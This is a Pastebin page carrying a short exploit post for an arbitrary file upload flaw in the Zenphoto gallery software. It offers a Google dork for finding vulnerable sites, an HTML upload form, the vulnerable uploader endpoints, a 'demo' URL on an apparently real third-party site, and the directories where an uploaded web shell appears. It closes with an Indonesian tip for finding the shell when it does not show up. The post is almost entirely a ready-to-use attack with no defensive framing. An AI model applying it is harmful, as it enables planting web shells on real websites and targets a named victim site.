Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Zenphoto - Arbitrary File Upload Vulnerability
- # Google Dork: inurl:/zp-core/setup/
- # Date: 19/07/2016
- # Affected Software: ZenPhoto (http://www.zenphoto.org/)
- # Version: Any Version
- # Tested on: Windows, Linux
- # Author : AnoaGhost
- Exploit CSRF :
- <form method="post" action="http://site.com/path/" enctype="multipart/form-data">
- <input type="file" name="files[]"/>
- <input type="submit"></input></input></form>
- Poc :
- http://site.com/path/zp-core/zp-extensions/uploader_jQuery/upload_form.php
- http://site.com/path/zp-core/zp-extensions/uploader_jQuery/uploader.php
- Demo ?
- http://svisimaging.be/portfolio_gallery/zp-core/zp-extensions/uploader_jQuery/upload_form.php
- Shell Path
- http://site.com/path/portfolio_gallery/
- http://site.com/path/portfolio_gallery/cache/Product/
- *Note : Kalau sudah terupload, dan shellnya tidak muncul, cari di dir lain atau targetnya tidak vuln, begitu :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement